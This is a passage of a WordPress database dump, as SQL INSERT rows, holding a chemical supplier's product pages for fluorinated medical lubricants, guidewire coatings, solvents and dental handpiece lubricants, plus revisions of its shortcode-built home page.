style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-18 15:51:54', '2016-08-18 15:51:54', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (466, 3, '2016-08-18 17:19:44', '2016-08-18 17:19:44', '', 'TDS-143XD (new format)', '', 'inherit', 'open', 'closed', '', 'tds-143xd-new-format', '', '', '2016-08-18 17:19:44', '2016-08-18 17:19:44', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/TDS-143XD-new-format.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (467, 3, '2016-08-18 17:31:54', '2016-08-18 17:31:54', '', 'ShieldSys Compounding Additives', 'ShieldSys is a family of PFPE (perfluoropolyether) based polymer additives designed for the needs of the medical industry. Our specialized chemistry facilitate migration of the PFPE to the exterior surfaces of the molded product, providing substantial reduction marring, abrasion, tackiness while increasing processibility and final product throughput. Benefits Include:\r\n<ul>\r\n 	<li class="Body"><span class="C-8">Continuous bloom to the surface</span></li>\r\n 	<li class="Body">Minimizes wear and abrasion</li>\r\n 	<li class="Body">Eliminates plate out and die build up</li>\r\n 	<li class="Body"><span class="C-8">Increased Chemical resistance</span></li>\r\n 	<li class="Body">Inert to other polymers and chemicals</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'milglide-compounding-additives', '', '', '2016-09-23 17:46:22', '2016-09-23 17:46:22', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=467', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (468, 3, '2016-08-18 17:35:28', '2016-08-18 17:35:28', '<h3><strong><span style="font-size: 14.4px;">TriboSys™ Fluorinated Synthetic Biocompatible Lubricants</span></strong></h3>\r\n<span style="font-size: 14.4px;">TriboSys™ PFPE (perfluoropolyether) biocompatible lubricants, oils and greases provide superior quality lubrication under the most challenging medical application in comparison to hydrocarbon and silicone alternatives. TriboSys™ was designed to decrease wear and extend service intervals on all medical devices. Medical device engineers will value the dramatic decrease in mechanical wear, unwanted noise, and broad temperature range our lubricants impart.  All variants of TriboSys are unaffected by all forms of sterilization and will not transfer or degrade under these conditions. Benefits include:</span>\r\n<ul>\r\n 	<li class="Body">Superior Lubrication over conventional alternatives</li>\r\n 	<li class="Body">Biocompatible (<a href="http://www.fda.gov/downloads/medicaldevices/deviceregulationandguidance/guidancedocuments/ucm348890.pdf">ISO 10993</a>)</li>\r\n 	<li class="Body">Chemically Inert; Non-<wbr />nutrient</li>\r\n 	<li class="Body">Non-<wbr />Flammable; Oxygen-<wbr />safe</li>\r\n 	<li class="Body">Odorless and Non-<wbr />Staining</li>\r\n</ul>\r\nThese biocompatible lubricants were specially designed to serve the medical industry. Meeting ISO 10993 biocompatibility standards these lubricants are ideal for medical devices. Devices such as <span class="C-12">Single and Multi-<wbr />Use Surgical Device Housings and Compressed Medical Gasses. </span>\r\n<h4 class="Body"><span class="C-12"><strong>Single and Multi-<wbr />Use Surgical Device Housings</strong>:</span></h4>\r\n<p class="Body"><span class="C-8">TriboSys™ is a high-<wbr />performance fluorinated lubricant that exhibits exceptional stability and will minimize mechanical wear </span><span class="C-8">allowing critical surgical devices to perform reliably and as designed. These biocompatible oils and greases are non-<wbr />nutrient ensuring microbial.</span></p>\r\n\r\n<h4 class="Body"><strong>Compressed Medical Gases:</strong></h4>\r\n<p class="Body">TriboSys™ grease is chemically inert and oxygen stable. This makes TriboSys™ the lubricant of choice for medical gas cylinders, anesthesia machines, and oxygen valves.</p>', 'TriboSys™ Fluorinated Synthetic Lubricants', 'TriboSys PFPE (perfluoropolyether) oils and greases provide superior quality lubrication under the most challenging medical application in comparison to hydrocarbon and silicone alternatives. TriboSys was designed to decrease wear and extend service intervals on all medical devices. Medical device engineers will value the dramatic decrease in mechanical wear, unwanted noise, and broad temperature range our lubricants impart.  All variants of TriboSys are unaffected by all forms of sterilization and will not transfer or degrade under these conditions. Benefits include:\r\n<ul>\r\n 	<li class="Body">Superior Lubrication over conventional alternatives</li>\r\n 	<li class="Body">Biocompatible (ISO 10993)</li>\r\n 	<li class="Body">Chemically Inert; Non-<wbr />nutrient</li>\r\n 	<li class="Body">Non-<wbr />Flammable; Oxygen-<wbr />safe</li>\r\n 	<li class="Body">Odorless and Non-<wbr />Staining</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'biocompatible-lubricants-grease-oil', '', '', '2017-01-17 21:04:13', '2017-01-17 21:04:13', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=468', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (469, 3, '2016-08-18 17:36:34', '2016-08-18 17:36:34', '<h2><strong>Water-based, One-Coat Fluoropolymer Medical Coatings</strong></h2>\r\n<h3>Next-Generation Technology; Unprecedented Performance and Safety; No Acid Primer (Cr(VI))</h3>\r\nMiller-Stephenson\'s waterbased Fluoropolymer medical coatings are designed to optimize coating adhesion, durability, and corrosion resistance while minimizing coefficient of friction. Our world-class next generation fluoropolymer chemistry delivers unmatched lubricity and adhesion on all medical guide wires. Its lower hazardous classification and stability at ambient temperature also help with handling, application pot-life, and storage conditions.  In practice, medical personnel will feel smooth, low-friction movement as the guidewire progresses through the vasculature. Benefits Include:\r\n<ul>\r\n 	<li class="Body">High Durability, Flexibility and Corrosion resistance</li>\r\n 	<li class="Body">Unmatched Surface Adhesion</li>\r\n 	<li class="Body">Elimination of Delamination</li>\r\n 	<li class="Body">Full Back Intergrated raw material manufacturing; Guarantees 100% consistency lot-to-lot</li>\r\n 	<li class="Body">Substantial safer than Cr(VI) / Acid Primer systems</li>\r\n 	<li class="Body">Stable to all forms of sterilization</li>\r\n 	<li class="Body">Passes all ISO and ASTM guidelines*</li>\r\n</ul>\r\n<p class="Body"><span class="C-8">Our next generation, acid primer-free, medical coatings are optimized to provide superior adhesion to stainless steel guidewires and other metal wire.  No other product on the market can match the adhesion characteristics and durability of our coating technology. 850G-102X are <span style="text-decoration: underline;">Next-generation</span> fluoropolymer medical coatings by Chemours™ / Miller-Stephenson™ provides excellent adhesion and corrosion protection on a variety of substrates (including stainless steel) while maintaining an extremely low coefficient of friction (high lubricity). These medical guidewire coatings are path forward for companies who want to stay ahead of the Regulatory restriction of Chromium-6 while enhancing consistency, surface adhesion, minimal coefficient of friction on there guidewire or electrocautery medical device  These formulations generate very uniform, thin films (5-<wbr />10 microns) which exceed all ISO and ASTM requirements. Extremely Low coefficient of friction tested by <span class="C-14">ASTM 1894</span><span class="C-14">; ASTM D3359 Adhesion Test; ISO 7802 Wire Wrap Test; ISO 11070 Corrosion Resistance Test.</span></span></p>\r\n\r\n<h3>Fluoropolymer Medical Coatings - Water-based, Superior Performance and Maximized Surface Adhesion</h3>\r\nThese waterbased coatings are formulated with special blends of fluoroplastics and other high-performance resins to improve toughness and abrasion resistance. Because the film components stratify during baking, most of the fluoroplastic properties (such as low friction and nonstick character) are retained. The 850G-102X medical coatings should be applied to smooth, clean metal. Bake requirements vary, depending on the specific coating.\r\n<h3 class="Body"><span style="font-size: 75%;"><strong><span class="C-12">Usage Recommendations:</span></strong></span></h3>\r\n<p class="Body"><span class="C-8">Miller-<wbr />Stephenson\'s PTFE guidewire coatings can be applied via spray or dip methods.  Proper post-<wbr />application curing equipment is critical to guarantee performance and durability. Acceptable curing equipment include high temperature ovens which can safely maintain temperatures of 400-<wbr />800 degree Fahrenheit or IR ovens.</span></p>\r\n\r\n<h3><span style="text-decoration: underline; font-size: 75%;"><strong>Performance and Facts of Fluoropolymer Medical Coatings:</strong></span></h3>\r\n<ul>\r\n 	<li>No Cr(VI)</li>\r\n 	<li>Water-based</li>\r\n 	<li>One coat system</li>\r\n 	<li>Non-corrosive, non-flammable, low VOC</li>\r\n 	<li>One year shelf life stored at room temperature</li>\r\n 	<li>Dark Green or variety color as requested</li>\r\n 	<li>Comparable low coefficient of friction as Industry Standard Acid-based PTFE Coating</li>\r\n 	<li>Extremely Low coefficient of friction tested by <span class="C-14">ASTM 1894</span></li>\r\n 	<li>Coated smooth stainless steel panels passed Adhesion test , ASTM-3359</li>\r\n 	<li>Coated stainless steel catheter guidewires passed flexibility / adhesion tests, ISO 7802 Annex F wrapping test</li>\r\n 	<li>Coated stainless steel catheter guidewires passed corrosion resistance, ISO 11070 Annex B, saline soak test</li>\r\n 	<li>Positive feedback from customer evaluations</li>\r\n 	<li>Electrocautery medical coatings</li>\r\n 	<li>Guidewire medical coatings</li>\r\n</ul>\r\n<a href="https://www.miller-stephenson.com/medical-guidewire-coatings/">For further information regarding our Medical coatings please see our article section or click here</a>\r\n\r\nhttps://www.youtube.com/watch?v=-YyTjhmKcyw\r\n\r\n<a href="https://www.miller-stephenson.com/tech-support/">For further information please contact our Technical Service team here</a>', '850G-102X Waterbased Fluoropolymer Coating', 'Our next generation waterbased, Non-Cr(VI) Fluoropolymer coating, designed to optimize coating adhesion, durability, and corrosion resistance while minimizing coefficient of friction. Our world-class fluoropolymer chemistry delivers unmatched lubricity and adhesion on all medical guide wires in the ease a one-coat system and a safe non-Cr(VI) system.  In practice, medical personnel will feel smooth, low-friction movement as the guidewire progresses through the vasculature. Benefits Include:\r\n<ul>\r\n 	<li class="Body">High Durability, Flexibility and Corrosion resistance</li>\r\n 	<li class="Body">Unmatched Surface Adhesion</li>\r\n 	<li class="Body">Elimination of Delamination</li>\r\n 	<li class="Body">Waterbased, One-coat formulation</li>\r\n 	<li class="Body">No Cr(VI); non-acid primer</li>\r\n 	<li class="Body">Passes all ISO and ASTM guidelines*</li>\r\n</ul>', 'publish', 'closed', 'closed', '', 'fluoropolymer-medical-coatings', '', '', '2017-06-26 00:56:08', '2017-06-26 00:56:08', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=469', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (471, 3, '2017-06-26 00:54:59', '2017-06-26 00:54:59', '<h2><strong>Water-based, One-Coat Fluoropolymer Medical Coatings</strong></h2>\n<h3>Next-Generation Technology; Unprecedented Performance and Safety; No Acid Primer (Cr(VI)</h3>\nMiller-Stephenson\'s waterbased Fluoropolymer medical coatings are designed to optimize coating adhesion, durability, and corrosion resistance while minimizing coefficient of friction. Our world-class next generation fluoropolymer chemistry delivers unmatched lubricity and adhesion on all medical guide wires. Its lower hazardous classification and stability at ambient temperature also help with handling, application pot-life, and storage conditions.  In practice, medical personnel will feel smooth, low-friction movement as the guidewire progresses through the vasculature. Benefits Include:\n<ul>\n 	<li class="Body">High Durability, Flexibility and Corrosion resistance</li>\n 	<li class="Body">Unmatched Surface Adhesion</li>\n 	<li class="Body">Elimination of Delamination</li>\n 	<li class="Body">Full Back Intergrated raw material manufacturing; Guarantees 100% consistency lot-to-lot</li>\n 	<li class="Body">Substantial safer than Cr(VI) / Acid Primer systems</li>\n 	<li class="Body">Stable to all forms of sterilization</li>\n 	<li class="Body">Passes all ISO and ASTM guidelines*</li>\n</ul>\n<p class="Body"><span class="C-8">Our next generation, acid primer-free, medical coatings are optimized to provide superior adhesion to stainless steel guidewires and other metal wire.  No other product on the market can match the adhesion characteristics and durability of our coating technology. 850G-102X are <span style="text-decoration: underline;">Next-generation</span> fluoropolymer medical coatings by Chemours™ / Miller-Stephenson™ provides excellent adhesion and corrosion protection on a variety of substrates (including stainless steel) while maintaining an extremely low coefficient of friction (high lubricity). These medical guidewire coatings are path forward for companies who want to stay ahead of the Regulatory restriction of Chromium-6 while enhancing consistency, surface adhesion, minimal coefficient of friction on there guidewire or electrocautery medical device  These formulations generate very uniform, thin films (5-<wbr />10 microns) which exceed all ISO and ASTM requirements. Extremely Low coefficient of friction tested by <span class="C-14">ASTM 1894</span><span class="C-14">; ASTM D3359 Adhesion Test; ISO 7802 Wire Wrap Test; ISO 11070 Corrosion Resistance Test.</span></span></p>\nThese waterbased coatings are formulated with special blends of fluoroplastics and other high-performance resins to improve toughness and abrasion resistance. Because the film components stratify during baking, most of the fluoroplastic properties (such as low friction and nonstick character) are retained. The 850G-102X medical coatings should be applied to smooth, clean metal. Bake requirements vary, depending on the specific coating.\n<h3 class="Body"><span style="font-size: 75%;"><strong><span class="C-12">Usage Recommendations:</span></strong></span></h3>\n<p class="Body"><span class="C-8">Miller-<wbr />Stephenson\'s PTFE guidewire coatings can be applied via spray or dip methods.  Proper post-<wbr />application curing equipment is critical to guarantee performance and durability. Acceptable curing equipment include high temperature ovens which can safely maintain temperatures of 400-<wbr />800 degree Fahrenheit or IR ovens.</span></p>\n\n<h3><span style="text-decoration: underline; font-size: 75%;"><strong>Performance and Facts of Fluoropolymer Medical Coatings:</strong></span></h3>\n<ul>\n 	<li>No Cr(VI)</li>\n 	<li>Water-based</li>\n 	<li>One coat system</li>\n 	<li>Non-corrosive, non-flammable, low VOC</li>\n 	<li>One year shelf life stored at room temperature</li>\n 	<li>Dark Green or variety color as requested</li>\n 	<li>Comparable low coefficient of friction as Industry Standard Acid-based PTFE Coating</li>\n 	<li>Extremely Low coefficient of friction tested by <span class="C-14">ASTM 1894</span></li>\n 	<li>Coated smooth stainless steel panels passed Adhesion test , ASTM-3359</li>\n 	<li>Coated stainless steel catheter guidewires passed flexibility / adhesion tests, ISO 7802 Annex F wrapping test</li>\n 	<li>Coated stainless steel catheter guidewires passed corrosion resistance, ISO 11070 Annex B, saline soak test</li>\n 	<li>Positive feedback from customer evaluations</li>\n 	<li>Electrocautery medical coatings</li>\n 	<li>Guidewire medical coatings</li>\n</ul>\n<a href="https://www.miller-stephenson.com/medical-guidewire-coatings/">For further information regarding our Medical coatings please see our article section or click here</a>\n\nhttps://www.youtube.com/watch?v=-YyTjhmKcyw\n\n<a href="https://www.miller-stephenson.com/tech-support/">For further information please contact our Technical Service team here</a>', '850G-102X Waterbased Fluoropolymer Coating', 'Our next generation waterbased, Non-Cr(VI) Fluoropolymer coating, designed to optimize coating adhesion, durability, and corrosion resistance while minimizing coefficient of friction. Our world-class fluoropolymer chemistry delivers unmatched lubricity and adhesion on all medical guide wires in the ease a one-coat system and a safe non-Cr(VI) system.  In practice, medical personnel will feel smooth, low-friction movement as the guidewire progresses through the vasculature. Benefits Include:\n<ul>\n 	<li class="Body">High Durability, Flexibility and Corrosion resistance</li>\n 	<li class="Body">Unmatched Surface Adhesion</li>\n 	<li class="Body">Elimination of Delamination</li>\n 	<li class="Body">Waterbased, One-coat formulation</li>\n 	<li class="Body">No Cr(VI); non-acid primer</li>\n 	<li class="Body">Passes all ISO and ASTM guidelines*</li>\n</ul>', 'inherit', 'closed', 'closed', '', '469-autosave-v1', '', '', '2017-06-26 00:54:59', '2017-06-26 00:54:59', '', 469, 'https://132.148.10.86/wordpress/469-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (473, 3, '2016-08-18 17:41:48', '2016-08-18 17:41:48', '', 'SolvSys Medical Solvents', 'Miller-<wbr />Stephenson\'s SolvSys product line are ultra high purity solvents specifically designed for precise cleaning of today\'s sensitive medical devices. SolvSys can be used in the most critical cleaning application such as medical oxygen service parts, where lesser solvent may leave behind residues that will hinder its operation. Our specialty solvent exhibit high cleaning coefficients (KB value), low surface tension, high surface wetting values; critical attributes for cleaning solvents. Benefits include:\r\n<ul>\r\n 	<li class="Body"><span class="C-8">High Cleaning Coefficient and Surface Wetting Indexes</span></li>\r\n 	<li class="Body"><span class="C-8">Nonvolatile residue and particulate free</span></li>\r\n 	<li class="Body"><span class="C-8">Non-<wbr />flammable</span></li>\r\n 	<li class="Body"><span class="C-8">Fully Compatible with Metallic and Non-<wbr />metallic surfaces</span></li>\r\n 	<li class="Body"><span class="C-8">Easily Recycled and Reclaimed</span></li>\r\n</ul>', 'publish', 'open', 'closed', '', 'milsolv-medical-solvents', '', '', '2016-09-13 14:12:50', '2016-09-13 14:12:50', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=473', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (474, 3, '2016-08-18 17:43:17', '2016-08-18 17:43:17', '<h2>FluoroExtreme™ Dental Handpiece Lubricants</h2>\r\n<h3>Superior Cleanliness; Quieter Handpieces; Longer Turbine and Bearing Life</h3>\r\nFluoroExtreme Dental Handpiece Lubricant - Few medical applications challenge a bearing lubricant more than high-<wbr />speed dental handpieces.  Rotating at speeds of excess of 500,000 rpm, these handpieces require advanced lubrication which can not only maintain excellent thin-<wbr />film strength, but also do not degrade under the immense mechanical and thermal stresses which occur within these handpieces turbines. FluoroExtreme Dental Handpiece Lubricants are the perfect match for your dental handpiece.\r\n\r\nFluoroExtreme™ are fluorinated synthetic Dental Handpiece Lubricants specially designed for dental tooling and handpieces. Our Dental Handpiece Lubricants offer superior protection, lubricity, and chemical stability versus standard hydrocarbon based dental lubricants. FluoroExtreme™ minimizes mechanical wear in all low and high speed handpieces, allowing devices to run longer and quieter  while reducing costly repair intervals. Benefits Include:\r\n<ul>\r\n 	<li class="Body P-5"><span class="C-8">Minimizes mechanical wear</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Reduction in debris formation</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Quieter operation</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Extends service life of critical components</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Biocompatible (ISO 10993)</span></li>\r\n</ul>\r\n<h3>FluoroExtreme™ Dental Handpiece Lubricants: Unmatched lubrication; No Dirty Deposits; Sterilization Stable</h3>\r\nProperly lubricated, the ball bearings inside a dental handpiece travel around the raceway on a thin film of oil, which prevents direct contact with the raceway. If the oil is not properly designed, however, the speeding balls are an accident waiting to happen. If a ball hits even a microscopic particle in the oil at high speed, the oil film will likely rupture and some scarring of the ball or raceway is likely. Over time, these collisions create unwanted noise, accelerated wear, and shorten the operating life. FluoroExtreme™  developed no deposits, the o-<wbr />rings remained intact, and the impellers exhibited minimal wear.  Dental handpieces have no noticeable increase in turbine noise. The data clearly shows that Miller-<wbr />Stephenson’s FluoroExtreme™, delivers substantially improved operation of your dental handpiece. Our handpiece lubricant minimizes the unsightly degradation seen with hydrocarbon-<wbr />based lubricants while maintaining quiet and clean operation.  Something both the operator and patient will value.\r\n\r\nTo learn more about the case study regarding FluoroExtreme and Hydrocarbons in Dental Handpieces please <a href="https://www.miller-stephenson.com/dental-handpiece-lubricant/">click here.</a>', 'FluoroExtreme™ Dental Handpiece Lubricants', 'FluoroExtreme™ is a fluorinated synthetic lubricant specially designed for dental handpieces. This lubricant offers superior protection, lubricity, and chemical stability versus standard hydrocarbon based dental lubricants. FluoroExtreme™ minimizes mechanical wear in all low and high speed handpieces, allowing devices to run longer and quieter  while reducing costly repair intervals.\r\n<ul>\r\n 	<li class="Body P-5"><span class="C-8">Minimizes mechanical wear</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Reduction in debris formation</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Quieter operation</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Extends service life of critical components</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Biocompatible (ISO 10993)</span></li>\r\n</ul>', 'publish', 'open', 'closed', '', 'dental-handpiece-lubricants', '', '', '2017-07-06 12:12:55', '2017-07-06 12:12:55', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=474', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (475, 1, '2016-08-18 17:58:52', '2016-08-18 17:58:52', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="product-category/release-agents/"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="6/8"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/8"]\r\n\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-18 17:58:52', '2016-08-18 17:58:52', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (476, 1, '2016-08-18 17:59:17', '2016-08-18 17:59:17', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="product-category/release-agents/"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="6/8"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="2/8"]\r\n\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-18 17:59:17', '2016-08-18 17:59:17', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (477, 1, '2016-08-18 17:59:53', '2016-08-18 17:59:53', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="product-category/release-agents/"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" 